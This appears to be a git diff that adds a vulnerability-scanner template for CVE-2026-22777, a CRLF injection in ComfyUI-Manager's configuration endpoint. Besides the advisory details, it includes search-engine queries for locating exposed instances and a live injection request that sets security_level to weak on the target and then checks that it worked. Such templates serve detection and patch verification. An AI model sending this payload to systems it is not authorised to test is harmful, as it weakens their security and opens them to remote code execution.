diff --git a/http/cves/2026/CVE-2026-22777.yaml b/http/cves/2026/CVE-2026-22777.yaml
new file mode 100644
index 000000000000..e4546c245a0a
--- /dev/null
+++ b/http/cves/2026/CVE-2026-22777.yaml
@@ -0,0 +1,77 @@
+id: CVE-2026-22777
+
+info:
+  name: ComfyUI-Manager - CRLF Injection via Configuration Endpoint
+  author: LK-maker-007
+  severity: high
+  description: |
+    ComfyUI-Manager versions prior to 3.39.2 (and 4.0.0 through 4.0.4) are vulnerable to
+    CRLF injection in the /api/manager/db_mode configuration endpoint. The write_config()
+    function does not sanitize carriage return (\r) or newline (\n) characters from
+    user-supplied query parameter values before writing to the config.ini file. An
+    unauthenticated attacker can inject arbitrary key-value pairs, including downgrading
+    security_level from normal to weak, enabling subsequent remote code execution via the
+    same chain as CVE-2025-67303. Exploitation requires ComfyUI to be started with the
+    --listen flag (network-accessible mode).
+  impact: |
+    An unauthenticated attacker can overwrite security-critical configuration values
+    including security_level=weak, which unlocks custom node installation. This enables
+    subsequent remote code execution through a malicious custom node.
+  remediation: |
+    Upgrade ComfyUI-Manager to version 3.39.2 or 4.0.5 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-22777
+    - https://github.com/Comfy-Org/ComfyUI-Manager/security/advisories/GHSA-562r-8445-54r2
+    - https://github.com/Comfy-Org/ComfyUI-Manager/commit/f4fa394e0f03b013f1068c96cff168ad10bd0410
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-22777
+    cwe-id: CWE-93
+    epss-score: 0.00015
+    epss-percentile: 0.03132
+    cpe: cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: comfy
+    product: comfyui-manager
+    shodan-query: http.title:"ComfyUI" http.html:"/api/manager"
+    fofa-query: title="ComfyUI"
+  tags: cve,cve2026,comfyui,crlf,injection,config-injection,intrusive,vuln
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/manager/db_mode"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - '!contains(body, "<html")'
+        condition: and
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+        internal: true
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/manager/db_mode"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "security_level = weak")'
+        condition: and